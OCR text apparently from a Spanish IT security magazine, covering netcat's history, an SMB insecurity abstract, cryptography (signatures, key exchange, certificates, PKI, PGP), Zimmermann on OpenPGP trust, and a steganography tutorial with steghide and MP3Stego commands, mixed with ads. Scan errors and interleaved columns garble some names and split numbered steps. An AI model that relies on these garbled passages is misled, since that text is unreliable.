los peligros de los troyanos, aunque algunos aprovecharon la 
ocasión para entretenerse “manejándole” la PC a algún compa- 
ñero de oficina. 


HISTORIA DE NETCAT 
Hobbit y Weld Pond 


Hobbit (hobbitWMavian.org) creó netcat en 1995 como una 
herramienta de debbuging y exploración de redes. La apli- 
cación resultó extremadamente útil y rica en posibilidades. 
Su propósito fue el de poder crear prácticamente cualquier 
tipo de conexión deseado. 


La versión original de netcat apareció par a correr bajo 
Unix y Linux. Weld Pond (weldGl0pht.com) fue quien 


realizó la versión para windows NT en 1998. El código 
fuente está disponible hoy para ambas versiones. 
Tanto Hobbit como Weld Pond participaron activamente en 
cDc y The LOpht respectivamente. 


¿Donde Puedo encontrar netcat? 


El netcat de Hobbit está disponible desde el sitio web de 
Security Focus. También allí se puede encontrar la versión 
para Windows de netcat. 
http://www.securityfocus.com/tools/137 
http://www.securityfocus.com/tools/139/scoreit 


Este es el tipo de trabajo que The LOpht y cDc han realizado 
desde su inicio. Buscando los defectos, haciéndolos conocidos, 
y creando herramientas que refuercen la red para convertirla en 
un lugar más seguro. Han estudiado productos de vendors (em- 
presas) de software y hardware y los han forzado a corregir los 
errores y lanzar mejores productos. Los miembros de The LOpht 
también se han comunicado extensamente con las diferentes 
publicaciones referentes a seguridad en Internet. Space Rogue, 
otro miembro de The LOpht, lanzó la “Red de Noticias del 
Hacker” [3], uno de los pocos lugares en la Web que cubre edi- 
ciones para hackers con mucha credibilidad. 


[1] www.cultdeadcow.com 
[2] www.I0pht.org 
[3] www.spacerogue.net 


Resumen del artículo original de Hobbit 


http://www. insecure.org/stf/cifs.txt 
CIFS: Common Insecurities Fail Scrutiny 


*Hobbit*, Avian Research, hobbitfMWavian.org, January 
1997 


Abstract 


Un análisis, es presentado de los protocolos TCP/IP 
NetBlOS utilizados para compartir archivos. Los pasos 
para establecer una conexión SMB cliente servidor es 
descripta en detalle. Se pone énfasis en las vulnerabili- 
dades administrativas y de los protocolos junto a modos 
para corregirlas. La idea es que el lector conozca ataques 
y posibles defensas. Varios ejemplos son presentados 
basados en el uso de programas del paquete Unix-Samba 
de modo de probar una red basada en IP que se usa de 
blanco. 
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el punto de partida para que SU NEGOCIO CREZCA. 
Windows XP le da el mayor poder de conexión, lo que significa mayor crecimiento para su 
empresa. Porque tiene la posibilidad de compartir aplicaciones, ubicar clientes y Windows*? 
proveedores de la forma más rápida, transferir archivos en iempo real, ver personas o a > 

productos vía webcam, optimizar su red de contactos, y disponer de asistencia técnica Professional 
remota sin moverse de su lugar de trabajo, También, puede acceder a la PC de su oficina 
desde cualquier equipo en cualquier parte del mundo y hacer presentaciones a distancia. 


Windows XP, conéctese al crecimiento. 


«Conozca más sobre Windows XP ingresando a (PA o llamando al (011) 4316-4600. 


Adquiri tu Windows XP en: Cronon Tecnología S.R.L. - Av. Ingeniero Huergo 1437 Peso 1* H - Capital Federal - 4300-4500 / Softmanía Computación $,M. - Suárez 1400 - Capital Federal - 4301-2458 / Gama 
Informática S.R.L. - Av. ing Huergo 1437 Piso 1* C - Capital Federal - 4307-8884 / Quality Work S.A. - Florin 939 Piso 4* G - Capital Federal - 4312-6702 / Damacomp S.A. - Sarmiento 412 Piso 2* Of, 204 - 
Capitol Federa! - 4328-3759 / Inntee S.A. - Chacabuco 431 - Capital Fodera! - 4331-0700 / L. P. Escobar Hnos. S.A, - Av. Julio A. Roca 576 - Copltal Foderni - 4342-3202 / Phonemark S.R.L. - Morono 15835 
Capital Federal - 4371-1028 / Waber y Asociados S.A.L. - ventesBwober com.ar Capital Federal 4381 7821 / Soluciones Modulares de Sistemas S.A.L. - A. Alsina 1433 Pio 10* A Capitol Federal - 4384 0741 
/ Six Working S.R.L. - Av. Nazca 4411 - Capital Federal - 4571-1900 / Eny Key S.R.L. - Castillo 1366 - Capital Federal - 4771-4177 / Blostar Group S.R.L. - Bonglard 1448 - Capital Federal - 4777-6227 / Grupo 
Sis S.R.L. - Alte. J, P, Sáoniz Valiente 1175 - Capital Fodera! - 4787-1050 / Allytech S.A. - Juramento 2059 Piso 1* - Capital Federal - 4787-9009 / Exod S.A. - Malpu 671 Pso 2* - Capital Federal - 4878-3963 / 
DAD Distribución Directa $.A, (DOSA) - Av, Honorio Pueyrredón 928 Piso 1* Of. A - Capital Federal - 4982-1251 / Mips Informática - Cerrito 1216 Piso 4* A - Capraal Federal - 50326479 / Solutionet S.A. - 
Poraguny 776 Piso 6* - Capital Federal - 5219-0595 / Digital Woridiow - Av. Maipú 3103 Piso 6* F - Olivos - 4790-8008. 
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ELEMENTOS DE A 
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raphy? 
gital Certificate? 


Public Key 
FHfrastructure 


know it... 


Si se quiere ahondar en temas de seguridad informática se deberá tener un claro entendimiento de criptografía. 

Los artículos "Elementos de Criptografía | (desarrollado en "NEX IT Specialist +10" de AGOSTO 2004 y "NEX IT Specialist" 4 13, 
Edición Especial "Ethical Hacking Volumen 1") y Il deben ser leídos en el siguiente espíritu: Los puntos en (1-5) dan el basamento, los 
ladrillos sobre lo que construimos dos herramienta básicas: Firma digital y Key Exchange (6 y 7). En 8 aprendemos otro elemento clave: 
el certificado y los CA (Certificate Authority). En 9 y 10 entenderemos qué se entiende por PKI (donde armamos el mecano con las 


piezas anteriores) y daremos algunos ejemplos de dónde se usa todo esto. PGP en (11) se incluye para evitar confusiones. 


MUY IMPORTANTE: 


No confunda ENCRIPTACION de llave pública (también 


llamada encriptación asimétrica) con INFRESTRUCTURA 
de llave pública (PKI, Public Key Infrastructure). 


6. Firma digital: combinar encriptación asi- 
métrica con hash 


Se puede utilizar encriptación asimétrica junto con algoritmos 
hash para crear una firma digital. Una firma digital actúa como 
una comprobación de integridad de datos y proporciona una 
prueba de posesión de la llave privada (autenticación). 


Los pasos para la firma digital (autenticación e integridad de 
datos) son los siguientes: 


1) El remitente aplica un algoritmo hash a los datos y genera un 
valor hash (a veces se lo llama un “message digest”). 


ii) Con su llave privada, el remitente encripta (firma) el valor 
hash. Al valor hash encriptado se lo denomina: “la firma digital 
del documento”. Es, información basada en el documento y la 
llave privada de quien firma. 


li) A continuación, el remitente envía al destinatario los datos, la 


firma digital y el certificado del remitente (en el certificado se 
envía la llave pública de quien firmó). 


iv) El destinatario aplica el algoritmo hash a los datos recibidos 
y genera un valor hash. 


v) El destinatario utiliza la llave pública del firmante para desen- 
criptar el hash encriptado que le enviaron. Así, compara los 
hashes para comprobar la firma. Esta comparación de hashes 
le garantiza que los datos no fueron modificados (integridad) y 
autentica a quién firmó (autenticación). 


Este proceso es transparente para el usuario. 


Los algoritmos hash pueden procesar los datos más deprisa 
que los algoritmos de encriptación asimétrica. La codificación 
hash de datos también reduce el tamaño de los datos que se 
van a firmar a una longitud fija y, por tanto, acelera el proceso 
de firma. Cuando se crea o se comprueba la firma, el algoritmo 
de llaves públicas tiene que transformar únicamente el valor de 
hash (128 ó 160 bits de datos). 


7. Intercambio de llaves (Key Exchange): 
combinar encriptación simétrica con encrip- 
tación asimétrica. 


Los algoritmos de llaves simétricas son excelentes para en- »> 


E¡NTMPYPágina_23.nex 


criptar datos de manera rápida y segura. Sin embargo, su punto 
débil reside en que el remitente y el destinatario deben inter- 
cambiar una llave secreta antes de intercambiar datos. La com- 
binación de algoritmos simétricos para encriptar datos con algo- 
ritmos de encriptación asimétrica con el fin de intercambiar la 
llave secreta resulta ser una solución rápida y escalable para el 
envío de datos encriptados. 


Los pasos involucrados en el intercambio de llaves basado en 
encriptación asimétrica son los siguientes: 


¡) El remitente obtiene la llave pública del destinatario. 
ii) El remitente crea una llave secreta aleatoria 


lii) El remitente utiliza la llave secreta con un algoritmo simétri- 
co para convertir el texto sin formato en texto cifrado. 


iv) El remitente utiliza la llave pública del destinatario para en- 
criptar la llave secreta. 


v) El remitente envía al destinatario el texto encriptado y la llave 
secreta encriptada. 


vi) Con su llave privada, el destinatario convierte la llave secreta 


garantiza que esa llave pública pertenece a quien dice ser 
su dueño (que posee la llave privada asociada)? 


Un certificado (llamado a veces public-key certificate) es una 
declaración firmada digitalmente que vincula el valor de una 
llave pública a la identidad del “entity” (persona, dispositivo o 
servicio) que posee la llave privada correspondiente. Quién 
firma digitalmente los certificados se llama CA, Certificate 
Authority. Al firmar el certificado, la entidad emisora de certifica- 
dos (CA), atestigua que la llave privada asociada a la llave 
pública del certificado está en posesión del “entity” indicado en 
el certificado. 


SINTESIS: un certificado lleva una llave pública y está 
firmado digitalmente por “alguien” llamado Certificate 
Authority (CA). TODOS deberemos confiar (trust) en el CA. 


Un certificado digital no es un certificado físico con un borde y 
un nombre con letras llamativas. Es un conjunto de bytes que 
contienen como mínimo: 


¡) El nombre de “qué” o “quién” (the entity, “la entidad”) está 
descrito en el certificado. Puede ser una persona (en el caso de 
e-mails), un servidor (en el caso de https usando SSL). 


li) La llave pública de “la entidad”. 


encriptada en texto sin formato. , . . 
ii) Cuándo expira el certificado 


vii) Con la llave secreta de texto sin formato, el destinatario con- 
vierte el texto encriptado en texto sin formato. 


8. Certificado y CA (Certificate Authority). 


La llave pública se difunde a cualquiera que la desee tener. 
La llave privada está en mi posesión y no la difundo. 
La pregunta es: ¿cómo difundo la llave pública y cómo se 


iv) Qué tipo de certificado es. Hay certificados para hacer e-mail 
seguro, certificados para identificar servidores para lPsec, cer- 
tificados para hacer seguros a los web servers vía SSL. 


v) Quién emitió el certificado. 


vi) Otro tipo de información que varía con el tipo de certificado. 


Philip R. Zimmermann creador de PGP 


Philip R. Zimmermann es el creador de Pretty Good Privacy (PGP) (Privacidad Bastante Buena). Por haber hecho esto, fue blanco 
de una investigación criminal durante tres años. Esto porque el gobierno americano sostenía que las restricciones para exportación 
de software de criptografía había sido violado cuando PGP se distribuyó por todo el 
mundo seguido a su publicación como freeware en 1991. A pesar de su falta de re- 
cursos, falta de personal pago, falta de una empresa para respaldarlo y persecución 
gubernamental, PGP así y todo se transformó en el software para encriptación de e- 
mails más popular del mundo. Luego que el gobierno retiró los cargos en 1996, 
Zimmeran fundó PGP Inc. La empresa fue luego adquirida por Network Associates 
Inc. (NAl) en Diciembre 1997. El permaneció como un Senior Fellow por tres años 
más. En 2002 PGP fue adquirida por una nueva empresa llamada PGP Corporation, 
donde Zimmerman ahora realiza tareas de consulta. En la actualidad realiza inde- 
pendientemente tareas de consultoría para una serie de empresas y organizaciones 
industriales en asuntos de criptografía. Es actualmente un Fellow de Stanford Law 
School's Center for Internet and Society. 

Antes de fundar PGP Inc, Zimmerman era un ingeniero de software con más de 20 
años de experiencia, especializándose en criptografía y seguridad de datos, comu- 
nicación de datos y sistemas embebidos en tiempo real. Su interés en el lado políti- 
co de la criptografía, nació de su pasado en asuntos relacionados con políticas militares. 

Ha recibido numerosas premios tanto técnicos como humanitarios por su trabajo pionero en criptografía. 

Zimmermann recibió su titulo de Licenciado en Ciencias de la computación de la Florida Altantic University en 1978. Es miembro 
de numerosas organizaciones: International Association of Cryptologic Research, la Association for Computing Machinery y la 
League for Programming Freedom. Es actualmente el chairman de OpenPGP Alliance y sirve en el Board of Directors for 
Computer Professionals for Social Responsibility, y en el Advisory Boards for Anonymizer.com, Hush Communications, Veridis y 
Qualys. 


(Más info en http://www.philzimmermann.com) 


»> 
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Esto es lo que hay en un certificado. ¿Pero qué es un certifica- 
do? Es una llave pública e información que identifica a “la 
entidad” (persona, server o...) detallados anteriormente y todo 
esto firmado digitalmente por alguien más. La idea es que 
cuando paso mi llave pública, no la paso así nomás sino que la 
paso firmada digitalmente por alguien (un tercero) en quien “la 
entidad” y a quien se la paso confía. 


Aclaremos partiendo de cero: 


1. Genero un par de llaves publica /privada. ¿Pero quién 
creería que la llave pública que disemino es mía si solo yo 
tengo la privada asociada? Aquí es donde aparece el certifica- 
do. 


2. Contacto una empresa que otorgue certificados digitales, una 
Certrificate Authority, CA). Ejemplos: VeriSign, Thawte o 
Baltimore. Les doy mi llave pública y les pido un certificado. 
Sólo ellos pueden generar un certificado firmado por ellos. Ya 
que ellos tienen su llave privada. En general estas compañías 
cobran por el servicio. Yo puedo en mi empresa tener un CA y 
dar mis certificados que serán creídos por quien confíe en mi 
CA. 


3. La empresa certificadora verifica quién soy yo y emitirá el cer- 
tificado y lo firmará digitalmente (es decir lo hasheará y firmará 
digitalmente con su llave privada. 


4. Me lo enviarán y yo lo usaré para difundir mi llave pública (por 
ejemplo, lo instalaré en el software o server apropiado). 


Los certificados entonces, proporcionan un mecanismo para es- 
tablecer una relación entre una llave pública y la entidad que 
posee la llave privada correspondiente. El formato más común 
de los certificados utilizados actualmente es X.509. X.509 no 
es la única forma de certificación. Por ejemplo, el correo elec- 
trónico seguro Pretty Good Privacy (PGP) se basa en una forma 
propia de certificados. 


9. Public Key Infrastructure (Infraestructura 
de llave pública) (PKI) 


¿Cómo monto la infraestructura de manejo y administra- 
ción de certificados? 
Respuesta: PKI 


Bienvenidos a la OpenPGP Alliance 


OpenPGP 


ALLIANCE 


AJES 


PKI nos detalla las directivas, los estándares y el software que 
regulan o manipulan los certificados y las llaves públicas y pri- 
vadas. En la práctica, PKI hace referencia a un sistema de cer- 
tificados digitales, entidades emisoras de certificados (CA) y 
otras entidades de registro que comprueban y autentican la 
validez de cada parte implicada en una transacción electrónica. 


10. ¿Dónde se usa todo esto? 


Todo lo descrito anteriormente es usado tanto en sistemas Unix 
como en el mundo Windows. 

Por ejemplo, a continuación y a modo de ejemplo detallamos lo 
que puede hacerse con PKI en Windows 2003: 

a) Crear y usar certificados para permitir que dos sistemas se 
comuniquen usando lPsec. Con PKI se pueden autenticar y/o 
encriptar la comunicación IP entre ellos. 

b) Permitir que mi web-browser acceda a un Web-server en 
forma segura, manteniendo una comunicación encriptada (por 
ejemplo cuando envio mi número de tarjeta de crédito usando 
SSL (Secure Socket Layer)). 

c) Crear y usar certificados para asegurar los e-mails. 

d) Logons usando smart-cards. 

e) Agentes de recuperación de EFS (Encripted File System) 

f) Firmar programas. 


11. PGP, Pretty Good Privacy 


Pretty Good Privacy (PGP) es un paquete de software desarro- 
llado por R. Zimmermann que provee rutinas criptográficas para 
e-mail y aplicaciones de almacenamiento de archivos. Lo que 
hizo Zimmerman es tomar criptosistemas ya existentes y proto- 
colos criptográficos y desarrolló un programa que puede correr 
en múltiples plataformas. Provee encriptación de mensajes, 
firmas digitales, compresión de datos y compatibilidad de 
e-mail. 


Los algoritmos que utiliza por default (especificados en el RFC 
2440) son: ElGamal y RSA para el transporte de llaves y 
triple-DES, IDEA y CASTS5 para la encriptación de mensajes. 


Las firmas digitales se consiguen utilizando DSA para firmar y 
SHA-1 o MD5 para la computación de los hashes de los men- 
sajes. El programa shareware ZIP es utilizado para comprimir 
mensajes para transmitirlos y almacenarlos. La compatibilidad 
con E-mail se logra con el uso de la conversión Radix-64. 


Working together ¡' 
to protect your privacy 


Home About OpenPGP News £ Events Members Technical Resources Contact 


OpenPGP es el estándar más usado de encriptación de e-mail en el mundo. Está definido 
por el OpenPGP Working Group del Internet Engineering Task Force (IETF) Proposed 
Standard RFC 2440. El estándar OpenPGP fue originalmente derivado de PGP (Pretty 
Good Privacy) que fue creado por Phil Zimmermann en 1991. 

La OpenPGP Alliance es un grupo creciente de compañías y otras organizaciones que son 
implementadoras del OpenPGP Proposed Standard. La Alliance trabaja para facilitar inter- 


operabibildad técnica y sinergia, de 


marketin 


About Open 2, News £ Events 


entre las implementaci iones de OpenPGP. 


Memb nar Technical Resources Contact 


OpenPGP Alliance 
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Porqué el PKI de OpenPGP es mejor que el PKI de X.509 


por Philip Zimmermann 
27 de Febrero de 2001 


En la mente de mucha gente, la frase "Public Key Infrastructure" se ha convertido en sinónimo de "Certificate Authority" (CA). Esto 
es porque en el mundo X.509, el único PKI con que nos encontramos está construido alrededor del CA. Matt Blaze hizo la siguien- 
te observación: "los CA comerciales nos protegerán de cualquiera al que ese CA no se niegue a aceptarle dinero". Estos CAs 
están "incluidos dentro" de la mayoría de los browsers, sin que el usuario pueda decidir de confiar en ellos o no. 

Alo largo de este artículo, nos referiremos a OpenPGP bajo el standard IETF en lugar de PGP, que es una implementación par- 
ticular del Standard OpenPGP. 


Existe, una Public Key Infrastructure OpenPGP. Pero lo que llamamos una PKI en el mundo openPGP es en realidad la amalga- 
ma que surge de la suma total de todas las llaves en la población de usuarios, todas las firmas en todas esas llaves, las opi- 
niones individuales de cada usuario de OpenPGP sobre a quién eligen como "introducers" confiables ("trusted introducers"), todas 
los softwares clientes que corren el modelo de confianzas openPGP y realizan cálculos sobre confianzas para cada usuario 
cliente y los servidores de llaves que en forma fluida diseminan este conocimiento colectivo. 


PGP ha crecido por muchos años sin la necesidad de establecer un CA centralizado. Esto es porque OpenPGP usa un sistema 
de "trusted introducers", que son equivalentes a un CA. OpenPGP permite a cualquiera firmar la llave pública de cualquier otro. 
Cuando Alice firma la llave de Bob, ella esta "introduciendo" la llave de Bob a cualquiera que confía en Alicia. Si alguien confía en 
Alice para introducir llaves, entones Alice es una "trusted introducer" en la mente de ese observador. 


Si yo obtengo una llave que ha sido firmada por varios "introducers" y uno de ellos es Alice, y yo confío en Alice, entonces esa 
llave está certificada por un "trusted introducer". Puede estar firmada por otros "trusted introducers", pero yo no confío en ellos, 
de modo que no son "trusted introducers" desde mi punto de vista. Es suficiente que Alice haya firmado la llave ya que yo confío 
en Alice. 


Sería aún mejor si dentro de los varios "introducers" de esa llave se incluyeran dos o más personas que yo confiara. Si la llave 

está firmada por dos "trusted introducers", entonces estaré más confiado en la certificación de esa llave, ya que es más impro- 
bable que una atacante pudiera engañar a dos "introducers" de mi confianza a firmar una 
llave "trucha". Las personas pueden ocasionalmente cometer errores y firmar la llave 
errada. OpenPGP tiene una arquitectura "fault tolerant" (a prueba de fallo) que me 
permite exigir que una llave este firmada por dos "trusted introducers" para que sea con- 
siderada válida. Esto permite un grado aún mayor de confianza en que la llave pertenece 
a la persona nombrada en la llave. 


Por supuesto, un atacante inteligente podría engañar a dos o más "introducers" no muy 
sofisticados a firmar una llave pública "trucha". Pero, eso no es importante en el modelo 
de confianzas de OpenPGP, ya que yo no confío en "introducers no sofisticados que 
pueden ser engañados muy fácilmente. Nadie debiera. Uno sólo debe confiar en "intro- 
ducers" honestos y sofisticados que entienden lo que significa firmar una llave, y ejerci- 
tarán seriedad en verificar la identidad del poseedor de la llave antes de firmar la llave 
en cuestión. 


Si sólo "introducers" no confiables firman llaves "truchas" nadie será engañado en el modelo de confianzas de PGP. Uno debe 
decirle al software OPenPGP cliente que "introducers" son de confianza. El software cliente usará ese conocimiento para calcu- 
lar si una llave está certificada propiamente por un "introducer" confiable mirando las firmas de uno de los "introducers" de con- 
fianza. Si la llave no posee firmas de "introducers" que uno le ha dicho al software que confía, el software cliente no considera la 
llave como certificada y no lo dejará usarla (o por lo menos le indicará no usarla). Cada uno elige a quién considera un "introduc- 
er" de confianza. En muchos casos habrá solapamiento, ya que muchos "introducers" se transforman en confiables para un amplio 
espectro. Podrían hasta firmar un gran número de llaves como una ocupación full-time. Esos son llamados CAs en el mundo 
X.509. 


No hay nada malo con tener CAs en OpenPGP. Si mucha gente elige confiar al mismo CA para que actúe como un "introducer", 
y todos ellos configuran sus propias copias del software cliente de OpenPGP para confiar a ese CA, entonces el modelo de con- 
fianzas OPenPGP actúa en idéntica manera que el modelo X.509. De hecho, el modelo de confianza OPenPGP es un "superset" 
(inversa de subconjunto) del modelo de confianzas centralizado que normalmente vemos en el mundo X.509. No existe ninguna 
situación en el modelo de confianza X.509 que no pueda ser tratado de idéntico modo en el modelo de confianza de OPenPGP. 
Pero, OpenPGP puede hacer mucho más, y con una arquitectura "fault tolerant", y más control del usuario sobre su perpectiva 
del modelo PKI. 


de 


E¡1TMPYPágina_26.nex 


3 LNIX 100 


Recursos 
«100 megabytes en disco 
«20 coentas de ema popa. 
Alis ilirmilados 


- Autoresponders ilimitados. 
+31 


+ Panel de Control Personal 2-11 : 
o ro ome/el contro 
* 2 6b e transfterenca mensual 

d W b 11 


Redirecconamiento 
cuenta FTP, 55H. 
Por que elegirnos; 
Atención enline y telefónico las 24hs, 


[Sd UNIX 700 Datacenter propio. 


OO Más de 10.000 websites confían en nosotros. 
- Odomegabrytes en disco. 


200) cuentas de email pop3 Exclusivo sistema de chat online. 

alias Plmitados 

: Autoresponders ilimitados. 

* Panel de Control Personal Z.1 

+ Eoi-hins, Perl y Java scripts. 

“10 6b de transferencia mensual, 
Redireccionamientos limitados. 

¿5 cuentas FTP, 55H, 


pl 
a] 
1 


25 NTIDO 


Recursos 


100 megabytes en disco 
¿0 cuentas de emall popa, 
Alias ilimitados, 

- Autoresponders limitados, 


+ Panel de Control Personal 2.11! 


Cgl-bIns, Perl y Jawa scripts, 

2 Gb de transferencia mensual. 
: ] Redireccionamiento. 

+1 cuenta FTE: 


Tel: +54 (11) 5031-1111 


Av. Belgrano 1586, piso 10 - infoífMtowebs.com - http:/Mwrww.towéebs.com 


ESTEGANOGRAFÍA 


Por Núria Prats i Pujol 


La palabra es bastante difícil de 
recordar y puede confundir pero la 
utilidad de la Esteganografia en los 
tiempos en que vivimos se está ha- 
ciendo cada vez más importante. 
En este artículo veremos de qué se 


¿Estega qué? 


La palabra Esteganografía viene 


del griego: esteganos (cubierto o imagen escondida... 


secreto) y grafos (escritura oO 

pintura). Es el arte de esconder in- 

formación de manera que la existencia del mensaje escondido 
pase desapercibida. La información no tiene por qué estar en- 
criptada. Puede estar a la vista y ser indiscernible para un ob- 
servador casual ya que ni siquiera sabe que está ahí. Por esto 
la Esteganografía es diferente que la criptografía. Una imagen 
de un perro puede contener la imagen de un avión que se esta 
diseñando. Un archivo de sonido puede contener frases con los 
planes de inversión de una empresa. 


El objetivo 


La era digital trajo consigo básicamente dos problemas. Por un 
lado está la desprotección de la privacidad tanto de los datos 
personales como de la transmisión de información entre per- 
sonas. Y por el otro se encuentra la imposibilidad de identificar 
la autenticidad de imágenes, videos, música, software y textos 
que se distribuyen en la red. Para resolverlos se ha tratado de 
encriptar los datos pero ¿de qué sirve si a la vez se está advir- 
tiendo que se encuentra allí oculta la info? Así como se de- 
sarrollan los algoritmos de encriptación se desarrollan métodos 
para desencriptar y atacar la protección. 

Por eso la Esteganografía para uso personal y la de uso co- 
mercial ha cobrado mucha importancia frente a la criptografía. 
La de uso personal porque está al alcance de cualquier usuario 
con conocimientos básicos de ordenadores (computadoras 
para nuestros lectores latino-americanos). Y la de uso comer- 
cial porque se utiliza para embeber una marca de agua en los 
productos digitales e identificarlos de aquellos de distribución 
ilegal en el cyber espacio. 

Entonces, el objetivo es transmitir información encubierta por un 
objeto que lo transporta inocuo de forma que la existencia del 
mensaje sea indetectable. 


¿Cómo se hace? 


Existen varios tipos de archivos que se pueden usar. En los de 
imágenes se toman bits del mapa de bits del gráfico y se los 
modifica levemente para que la imagen no cambie notoria- 
mente. Sin una comparación con la imagen original no se 
podría notar la diferencia. ¡Incluso se puede hacer de forma que 
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trata y sus aplicaciones. También ?! Peso del archivo sea el mismo! 


En los archivos de audio se graba 


te desafiamos a que encuentres la el mensaje en los bits de wav más 


insignificantes así parece que el 
audio original no se vea afectado. 


Programas 


Probamos algunos programas que sirven para ¡es- 
teganografear mensajes! Para Linux y para Windows. Espero 
que lo intentes. 


Steghide v.0.5.1 para windows. (OpenSource) 


Copia el archivo zip de la pagina web [1] y descomprimilo. Te 
provee de un manual en español de uso (tipo de archivo pdf). 
Este programa sirve para comprimir, encriptar y a la vez au- 
tomáticamente chequear el proceso. Los archivos JPEG, BMP, 
WAV y AU son soportados como archivos de cobertura 
(portada). No existe ninguna restricción en el tipo de archivo de 
datos secretos. Esto es todo, ya podes empezar. Tenemos un 
archivo de imagen grande.jpg y queremos embeber en esta el 
archivo texto.txt. El comando es: 

C:Documents and Settingsisteghide> steghide embed -cf 
grande. jpg -ef texto.txt 

Te devolverá inmediatamente el siguiente mensaje y tendrás 
que introducir una contraseña 


Anotar salvoconducto: 

Re-ingresar salvoconducto: 

adjuntando "texto.txt" en "grande.jpg"... hecho 

¡Puedes comprobar que la alteración de la foto es impercepti- 
ble! Si quisieras ahora extraer el archivo escondido: 
C:WDocuments and Settingsisteghide> steghide extract -sf 
grande.jpg 

Anotar salvoconducto: 

Anotó los datos extraídos e/"texto.txt". 

Eso sí, no te tienes que olvidar la clave porque debe ser la 
misma que usaste cuando embebiste el archivo. El archivo que 
se embebe debe ser mas chico que el archivo de máscara (en 
nuestro caso grande.jpg es mas grande que texto.txt) 


Steghide v.0.5.1 para linux 
Bajar el archivo para Linux y descomprimirlo. En nuestro caso: 


esperxat: ?/Desktop/steghide + bunzip2 steghidw-0.5.2tar.bz2 « 


esperxat: ?/Desktop/steghide + Is 
. .. steghide-05.1.tar 
esperxat: ?/Desktop/steghide + tar -xvf steghide-0.5.1.tar 


Luego 


esperxat: ?/Desktop/steghide + cd steghide-0.5.1/ 

esperxat: ?/Desktop/steghide/steghide-0.5.1 + ./configure 
esperxat: ?/Desktop/steghide/steghide-0.5.1 H* make 

esperxat: ?/Desktop/steghide/steghide-0.5.1 + su -c "make 
install" 


Se necesitan ciertas librerías para que funcione el programa: 
Libmhash (una librería que tiene varios códigos de encriptación) 
[2], Libmcrypt [3], Libjpeg (sin ella no podríamos adjuntar 
archivos jpg ni extraerlos) [4] y zlib [5]. 


Libmhash es la única imprescindible sin embargo si no se 
tienen las otras se pierden características del programa. 


Los comandos para embeber y extraer son los mismos que ex- 
plicamos antes para el caso en windows. 


MP3Stego para Windows 


Comentaré acerca del programa MP3Stego [6]. Este esconde 
información durante la compresión de los archivos MP3 tan en- 
vogue. Los datos se comprimirán, encriptarán y luego ocultaran 
en el archivo de MP3 (te recomendamos que utilices el que 
posee la interfase gráfica, ya que sino tendrás que compilarlo 
en el Visual Studio C++). Supongamos que queremos escon- 
der el archivo texto.txt para que parezca un archivo .mp3. 
Debemos tener un archivo que servirá de máscara .wav (debe 
ser mono, 16BITS, 44100Hz, PCM) y deben estar todos en el 
directorio donde están los archivos ejecutables del programa. 
Para enmascarar: 


C:IDocuments and SettingsIMMP3stego>encode -E texto.txt 
water.wav agua.mp3 


Luego nos retornará un mensaje donde deberemos introducir 
una clave y confirmarla 


MP3StegoEncoder 1.1.15 

See README file for copyright info 

Microsoft RIFF, WAVE audio, POM, mono 44100Hz 16 bit, 
Lenght: 0: 0: 9 

MPEG-! layer 1Il, mono Psychoacoustic Model: AT8.T 
Bitrate=128 kbps De-emphasis: none CRC: Off 

Encoding "water.wav" to "agua.mp3" 

Hiding "texto.txt" 

Enter a passphrase: 


Lo desafiamos! 


En nuestra página web [8] encontrará 
una imagen. Usando Steghide v.0.5.1 
descubra la imagen que hay debajo. 
Aparte podrá comparar con la original 
para ver que no ha cambiado dema- 
siado. La palabra clave es: NEX. 
Agradecemos las imágenes 
prestadas a nuestro fotógrafo Oscar 
Varela Rizo. 


Confirm your passphrase: 


Tardará algunos segundos el proceso 
[Frame 349 of 349] <100.00%> Finished in 0: 0: 8 


Y nos retornará un archivo de salida agua.mp3 en el mismo di- 
rectorio ¡Y puedes probar y escuchar el archivo .mp3 de salida 
sin darte cuenta que tiene un archivo de texto escondido! 

Para revertir el proceso: 


C:.Documents and SettingsMP3stego>decode -X agua.mp3 
Existen otros programas como Gifshuffle [7] que sumerge men- 


Una historia antigua de la esteganografía 


Cuando el tirano griego Hisitaeus fue tomado como prisionero 
del rey Darius en el siglo 5 a.C. y debía mandar un mensaje 
hizo que se rasurarse la cabeza un esclavo y le tatuó este 
mismo en su cuero. Espero que le volviera a crecer el pelo y lo 
envió a la otra ciudad donde el mensaje fue recibido. El arte de 
la escritura cubierta es algo que se puede encontrar en libros 
antiguos ya que ha sido una ciencia que ha dio evolucionando 
durante la historia de la humanidad para ayudar a la gente. 


sajes en imágenes GIF alterando el mapa de colores. También 
Texto que es un programa rudimentario que convierte datos en 
código ASCII a oraciones en ingles. Esto hará que evada los 
programas de escaneo automático ya que simulan texto en 
inglés. No hemos mencionado que también la Esteganografía 
puede servir para ocultar información en disquetes sin poder ser 
detectado. Así por ejemplo el programa S-Tools no sólo que 
utiliza archivos BMP, GIF o Wav para enmascarar sino que 
esconde la información en el espacio inutilizado del disquete 
(sólo la versión 3 y además a diferencia de los anteriores sólo 
puede usarse bajo Windows y es el más popular de todos). 


Hablamos brevemente al comienzo del artículo sobre las 
marcas de agua (watermark) que se realizan a los productos 
digitales que equivalen al sello de marca registrada. A pesar de 
que se han mejorado con el tiempo y ahora sobreviven a 
ajustes de brillo, aplicación de filtros e inclusive impresiones y 
escaneos tenemos que mencionar que estas huellas son fáciles 
de borrar sin perdida de la calidad (dos ejemplos son StirMark 
y UnZign). 

Bueno, espero que ahora sí se acuerden de la palabra... ¿es- 
tegano qué? 


Bibliografía: 

[1] http://steghide.sourceforge.net/ 

[2] http://mhash.sourceforge.net/ 

[3] http://mcrypt.sourceforge.net/ 

[4] http://www.ijg.org/ 

[5] http://www. gzip.org/zlib/ 

[6] http://www. petitcolas.net/fabien/steganography/mp3stego/ 
[7] http://www.darkside.com.au/gifshuffle// 

[8] http://www.nexweb.com.ar 


Núria Prats ¡ Pujol 


Es consultora en programación web/base de datos. En la 
actualidad realiza su doctorado en Física Teórica en la 
Universidad de Barcelona, España. Se la puede contactar 
en nuriapip(Vnexweb.com.ar 4 
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Por Leonel Becchio 


Definimos como autenticación a todo proceso de verificación de la identidad de alguien o 
algo. En todo proceso de autenticación las entidades que intervienen se validan mutua- 
mente para poder trabajar. Si esta autenticación fracasa, no existe una confianza mutua 


para intercambiar información. 
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Principios 


Si alguien que Ud. conoce personalmente se acer- 
case a su casa, Ud. probablemente verificará que 
se trata de tal persona y dejará pasarlo abriendo la 
puerta. Ud. está aplicando un sistema de autentica- 
ción muy simple para validar la identidad de esa 
persona. Pongamos el caso de que Ud. trabaja 
como personal de seguridad en una empresa con 
